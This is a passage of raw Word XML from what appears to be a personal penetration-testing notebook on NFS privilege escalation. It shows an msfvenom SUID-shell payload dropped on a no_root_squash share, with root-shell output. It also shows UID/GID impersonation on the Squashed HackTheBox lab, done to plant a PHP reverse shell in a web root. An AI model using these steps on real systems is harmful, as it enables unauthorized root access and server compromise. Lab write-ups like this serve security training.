        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir /tmp/nfs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1268"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mount -o rw,vers=2 192.168.1.25:/tmp /tmp/nfs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F65">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1268"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the root user on your local machine, generate a payload and save it to the mounted share</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1268"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1268"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure the file has the SUID bit set, and is executable by Everyone</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1268"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +xs /tmp/nfs/shell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1268"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the target machine, execute the file to get a root shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1268"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/shell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1268"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash-4.1# id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1268"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=1000(user) gid=1000(user) euid=0(root) egid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F6D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F6E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F6F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F70">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F71">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F72">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F73">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_31480nv5f8k3" w:id="422"/>
      <w:bookmarkEnd w:id="422"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Impersonation (editing UID/GID) to read file/directory for NFS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F74">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F75">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Squashed HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we have an NFS directory that we mounted locally, and the files of the directory contain the files of a website. But, we don't have editing privileges for the directory. However, after running "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -ld</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">", we saw that the directory is owned by the UID 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F76">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5353050" cy="800100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="473" name="image463.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image463.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1044"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5353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2F77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="939"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Directory is owned by the UID 2017</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="939"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Belongs to the group with the ID of www-data, or 33 (www-data usually has GID 33)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F79">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F7A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since NFS has no mechanism for authentication or authorization whatsoever, by assuming the identity of the share's owner, we also assume their permissions on the directory itself.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F7B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F7C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The plan now is to imitate the user with the UID of 2017 , try adding a php file containing our reverse shell to the webserver and then use our browser to trigger it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F7D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F7E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We start by creating a new user on our local machine, and assign them the respective UID:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F7F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1368"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo useradd xela</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F80">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F81">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This user will by default have a UID/GID of the highest ID found in /etc/passwd , plus one. Usually this will be 1001 . To change the UID, we run the following command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F82">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo usermod -u 2017 xela</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F83">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F84">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In theory, we can leave the GID as is, but for complecity's sake we can change it as follows, using groupmod</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="411"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo groupmod -g 2017 xela</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F86">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F87">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can verify our new user's data by taking a look at our /etc/passwd file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="884"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/passwd | grep xela</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="428"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3971925" cy="1333500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="37" name="image41.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image41.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1045"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="39719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F8A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F8B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F8C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Having created our impostor user, we should now be able to interact with the share mounted on /mount/1, namely /var/www/html , by using su to run commands as xela.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo su xela</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F8E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We switch to the user xela, to finally impersonate as xela</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F8F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F90">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F91">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2324100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="117" name="image120.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image120.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId104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2F92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="434"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After running "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -al /mnt/1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">", we can finally see that we are able to view all the contents of the NFS directory. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The impersonation worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F93">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F94">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
